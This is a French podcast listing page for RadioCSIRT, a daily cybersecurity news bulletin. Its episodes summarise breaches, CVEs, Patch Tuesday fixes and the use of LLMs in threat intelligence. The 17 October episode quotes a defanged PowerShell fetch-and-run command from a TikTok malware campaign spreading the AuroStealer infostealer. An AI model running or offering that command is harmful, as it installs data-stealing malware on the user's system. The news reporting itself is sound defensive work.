Powered by RND
PodcastsActualités🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️

🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️

Marc Frédéric GOMEZ
🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️
Dernier épisode

Épisodes disponibles

5 sur 461
  • RadioCSIRT — Votre actu cybersécurité du mardi 21 octobre 2025 (Ép.461)
    Bienvenue dans votre bulletin cybersécurité du jour ⚡️ 🦠 Xubuntu piraté pour diffuser des malwares Windows Le site officiel de Xubuntu a été compromis durant le week-end pour distribuer des malwares ciblant les utilisateurs Windows. L’attaque a exploité un accès non autorisé pour injecter des fichiers malveillants. ⚠️ CISA ajoute cinq vulnérabilités exploitées à son catalogue La CISA a ajouté cinq vulnérabilités récemment exploitées à son catalogue, soulignant des risques critiques pour des produits largement utilisés. Ces failles touchent des systèmes essentiels pour la cybersécurité. 🛡️ CERT-FR — Vulnérabilité Tenable Identity Le CERT-FR a publié l’avis CERTFR-2025-AVI-0897 concernant une vulnérabilité critique dans Tenable Identity, permettant une escalade de privilèges. Un patch est disponible pour remédier à ce problème. 🕵️‍♂️ NSO interdit d’exploiter Pegasus contre les utilisateurs WhatsApp NSO Group a été définitivement banni de cibler les utilisateurs WhatsApp avec son logiciel espion Pegasus après une décision judiciaire importante. 💣 Fuite de données sensibles des bases militaires britanniques Le groupe russe Lynk a divulgué des documents sensibles du ministère britannique de la Défense, incluant des informations sur huit bases militaires. 🔓 Violation de sécurité F5 expose 262 000 systèmes Big-IP Une nouvelle faille dans F5 a exposé plus de 260 000 systèmes Big-IP à travers le monde, mettant en danger des infrastructures critiques. 🔌 Microsoft résout un problème de récupération USB sous Windows Microsoft a corrigé un problème critique qui rendait la fonction de récupération Windows inutilisable pour les utilisateurs de périphériques USB. ⚡️ On ne réfléchit pas, on patch ! 📚 Sources: https://next.ink/brief_article/le-site-de-xubuntu-pirate-pendant-le-week-end-pour-distribuer-des-malwares-windows/ https://www.cisa.gov/news-events/alerts/2025/10/20/cisa-adds-five-known-exploited-vulnerabilities-catalog https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0897/ https://arstechnica.com/security/2025/10/nso-permanently-barred-from-targeting-whatsapp-users-with-pegasus-spyware/ https://securityaffairs.com/183640/data-breach/russian-lynk-group-leaks-sensitive-uk-mod-files-including-info-on-eight-military-bases.html https://securityaffairs.com/183606/security/f5-breach-exposes-262000-big-ip-systems-worldwide.html https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-usb-issue-that-made-windows-recovery-unusable/ 📞 Partagez vos retours: 📱 07 68 72 20 09 📧 [email protected] 🌐 www.radiocsirt.org 📰 radiocsirt.substack.com #CyberSécurité #CERT #SOC #Tenable #NSO #WhatsApp #DataBreach #Microsoft #F5 #Xubuntu #RadioCSIRT
    --------  
    13:53
  • RadioCSIRT — CTI & LLM : vers une génération augmentée d’indicateurs (Ép.459)
    🧠 Au programme aujourd’hui : ➡️ Comment les grands modèles de langage (LLM) transforment la Cyber Threat Intelligence. ➡️ Extraction automatisée d’IOCs à partir de rapports techniques (CERT-FR, Mandiant, etc.). ➡️ Corrélation augmentée : comment GPT-5, Claude 3 ou Llama 3 aident à contextualiser les menaces. ➡️ Les dérives possibles : hallucinations, fuites de données, biais d’attribution. ➡️ Pourquoi la CTI de demain sera augmentée, pas automatisée. 🧩 Concrètement : Les CERT, CSIRT et SOC explorent désormais les capacités des LLM pour accélérer : la structuration des rapports techniques non standardisés, la corrélation d’indicateurs via OpenCTI, MISP et la détection des patterns faibles dans les logs et menaces émergentes. Mais attention : ➡️ Un LLM n’a aucune conscience du risque. ➡️ Il peut inventer des IOC inexistants. ➡️ Et il ne doit jamais être connecté à des données sensibles sans contrôle humain. C’est toute la philosophie du Human-in-the-Loop : 👉 L’IA accélère. L’humain valide. La CTI gagne en précision. 📚 Sources : https://www.mandiant.com/resources https://www.cert.ssi.gouv.fr/ https://github.com/OpenCTI-Platform/opencti https://python.langchain.com/ https://llamaindex.ai/ 🎧 Écoutez RadioCSIRT sur : 📱 Apple Podcast – Spotify – SoundCloud – Deezer 📞 Contact : 07 68 72 20 09 - 🔗 https://www.radiocsirt.org #Cybersecurity #ThreatIntelligence #CTI #SOC #CSIRT #LLM #GPT4 #OpenCTI #AI #RadioCSIRT
    --------  
    37:52
  • RadioCSIRT - Votre actu cybersécurité du vendredi 17 octobre 2025 (Ép.457)
    Bienvenue dans votre bulletin cybersécurité du jour ⚡️ 🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré. La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884. 👮 Europol — Démantèlement d’un réseau international de SIM-box L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.Deux sites web, gogetsms.com et apisim.com, ont été saisis.Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau. 📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539 Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.Score CVSS 9.8, sans privilèges ni interaction. Corrigée en version 2.4.0, supprimant le mécanisme vulnérable. 🎬 TikTok — Campagne PowerShell diffusant AuroStealer Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données. Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque. 📨 Zendesk — Détournement massif des workflows de support Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk. Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles. Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ». ⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière. Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C. ⚡️ On ne réfléchit pas, on patch ! 📚 Sources : https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/ https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/ https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/ https://cyberpress.org/tiktok-powershell-malware/ https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/ https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm 📞 Partagez vos retours : 📱 07 68 72 20 09 📧 [email protected] 🌐 https://www.radiocsirt.org 📰 https://radiocsirt.substack.com #CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT
    --------  
    14:56
  • RadioCSIRT — Patch Tuesday octobre 2025 (Ép.456)
    Bienvenue dans votre bulletin spécial Patch Tuesday d’octobre 2025 ⚡️ 🧩 Microsoft — 172 vulnérabilités corrigées, 6 zero-days Le Patch Tuesday d’octobre corrige 172 failles, dont 6 zero-days et 8 vulnérabilités critiques. Fin de support pour Windows 10, remplacé par le programme Extended Security Updates (ESU). Les zero-days exploitées sont : CVE-2025-24990 — Agere Modem Driver, élévation de privilèges, pilote supprimé du système. Attribution : Fabian Mosch et Jordan Jay. CVE-2025-59230 — Windows Remote Access Connection Manager, élévation de privilèges locale, exploitation active. Attribution : MSTIC et MSRC. CVE-2025-47827 — Secure Boot bypass dans IGEL OS avant la version 11, découverte par Zack Didcott. Les zero-days divulguées publiquement : CVE-2025-0033 — AMD EPYC SEV-SNP, corruption RMP lors de l’initialisation. Chercheurs : Benedict Schlueter, Supraja Sridhara, Shweta Shinde (ETH Zurich). CVE-2025-24052 — Variante de la faille Agere Modem, exploitable même sans modem actif. CVE-2025-2884 — TCG TPM 2.0, lecture hors limites, risque de divulgation d’informations. Attribution : Trusted Computing Group et chercheur anonyme.   🚨 CVE-2025-59287 — Windows Server Update Services (WSUS) Faille critique d’exécution de code à distance, score CVSS 9.8. Vecteur réseau, aucune authentification requise. Microsoft qualifie l’exploitation comme « plus probable ». 📄 Microsoft Office et composants associés Plusieurs vulnérabilités RCE via le Preview Pane (CVE-2025-59227, CVE-2025-59234). Correctifs aussi pour Azure, Entra ID, Copilot, Kernel, BitLocker, Exchange, SharePoint, .NET et Visual Studio. 🔧 Autres éditeurs — Mises à jour d’octobre 2025 Adobe : correctifs multiples.   Cisco : IOS, UCM, Cyber Vision Center. Draytek : RCE pré-auth sur routeurs Vigor. Gladinet : zero-day CentreStack activement exploitée. Ivanti : correctifs pour EPMM et Neurons for MDM. Oracle : deux zero-days dans E-Business Suite. Redis : RCE de sévérité maximale. SAP : faille critique d’exécution de commande dans NetWeaver. Synacor : zero-day dans Zimbra Collaboration Suite exploitée pour vol de données. 🧭 Cycle de vie Microsoft Derniers correctifs gratuits pour Windows 10, Office 2016/2019, Exchange 2016/2019. Remplacement d’Exchange Server par Exchange Server Subscription Edition. ⚡️ On ne réfléchit pas, on patch ! 📚 Sources : https://krebsonsecurity.com/2025/10/patch-tuesday-october-2025-end-of-10-edition/ https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/ https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/ 📞 Partagez vos retours : 📱 07 68 72 20 09 📧 [email protected] 🌐 https://www.radiocsirt.org 📰 https://radiocsirt.substack.com #CyberSécurité #PatchTuesday #Microsoft #CERT #CVE #ZeroDay #Windows10 #WSUS #Office #Azure #Exchange #TPM #AMD #RCE #Update #RadioCSIRT
    --------  
    7:56
  • RadioCSIRT — Votre actu cybersécurité du jeudi 16 octobre 2025 (Ép.455)
    Bienvenue dans votre bulletin d'actualités cybersécurité ⚡️ 🔥 F5 Networks — Intrusion majeure par acteur étatique F5 révèle une compromission détectée le 9 août 2025. Un acteur étatique sophistiqué a maintenu un accès persistant long terme dans les environnements de développement BIG-IP. Code source exfiltré, informations sur des vulnérabilités non publiques dérobées. La CISA publie la directive d'urgence 26-01 ordonnant aux agences fédérales de patcher avant le 22 octobre. Le NCSC britannique émet également une alerte. Risque : exploitation des produits F5 pour voler credentials et clés API, permettant mouvements latéraux et accès persistants dans les réseaux cibles. 📊 CERT-FR — 46 vulnérabilités corrigées dans l'écosystème F5 Le CERT-FR publie l'avis CERTFR-2025-AVI-0886. F5 corrige 46 CVE dans son bulletin K000156572 du 15 octobre. Impacts multiples : RCE, élévation de privilèges, SSRF, XSS et déni de service. Tous les BIG-IP sont concernés : versions 15.1.x, 16.1.x, 17.1.x et 17.5.x nécessitent une mise à jour immédiate. Également touchés : BIG-IP Next CNF, BIG-IP Next pour Kubernetes, BIG-IP Next SPK et NGINX App Protect WAF avant la version 4.7.0. 💬 Mattermost — Multiples failles de sécurité Le CERT-FR alerte via l'avis CERTFR-2025-AVI-0888 sur six bulletins de sécurité Mattermost publiés le 15 octobre : MMSA-2025-00465, 00492, 00493, 00518, 00540 et 00541. Versions vulnérables : Mattermost Server 10.5.x avant 10.5.12, 10.10.x avant 10.10.3, 10.11.x avant 10.11.4, 10.12.x avant 10.12.1, et toutes les versions 11.x avant 11.0.0. La nature exacte des risques n'est pas précisée par l'éditeur. 🚨 Adobe Experience Manager — CVE-2025-54253 exploitée activement La CISA ajoute la CVE-2025-54253 à son catalogue KEV. Score CVSS 10.0 sur 10. Exploitation active confirmée dans la nature. Cette faille de mauvaise configuration affecte Adobe Experience Manager Forms versions 6.5.23 et antérieures, permettant une RCE sans authentification ni interaction utilisateur. Découverte par Adam Kues et Shubham Shah de Searchlight Cyber, divulguée le 28 avril, patchée en août. Un proof-of-concept est public. Deadline CISA pour les agences fédérales : 5 novembre 2025. ⚡️ On ne réfléchit pas, on patch ! 📚 Sources : https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network https://www.cisa.gov/news-events/news/cisa-issues-emergency-directive-address-critical-vulnerabilities-f5-devices https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0886/ https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0888/ https://www.bleepingcomputer.com/news/security/cisa-maximum-severity-adobe-flaw-now-exploited-in-attacks/ 📞 Partagez vos retours : 📱 07 68 72 20 09 📧 [email protected] 🌐 https://www.radiocsirt.org 📰 https://radiocsirt.substack.com #Cybersécurité #ThreatIntel #CERT #SOC #F5 #CISA #NCSC #Adobe #AEM #RCE #Mattermost #Patch #EmergencyDirective #KEV
    --------  
    5:05

Plus de podcasts Actualités

À propos de 🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️

🎙 Marc Frédéric Gomez, expert en cybersécurité, vous livre chaque jour l’essentiel des menaces, attaques et stratégies de défense à connaître. 🔎 Au programme : ✔️ Décryptage des cyberattaques et vulnérabilités critiques ✔️ Veille stratégique pour les CSIRT, CERT et pros de la cybersécurité ✔️ Sources et références pour approfondir chaque sujet 💡 Pourquoi écouter RadioCSIRT ? 🚀 Restez à jour en quelques minutes par jour 🛡️ Anticipez les menaces avec des infos fiables et techniques 📢 Une veille indispensable pour les pros de l’IT et de la sécurité 🔗 Écoutez, partagez et sécurisez votre environnement ! 📲 Abonnez-vous et laissez une note ⭐ sur votre plateforme préférée !
Site web du podcast

Écoutez 🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️, HugoDécrypte - Actus et interviews ou d'autres podcasts du monde entier - avec l'app de radio.fr

Obtenez l’app radio.fr
 gratuite

  • Ajout de radios et podcasts en favoris
  • Diffusion via Wi-Fi ou Bluetooth
  • Carplay & Android Auto compatibles
  • Et encore plus de fonctionnalités
Applications
Réseaux sociaux
v7.23.9 | © 2007-2025 radio.de GmbH
Generated: 10/22/2025 - 2:42:41 AM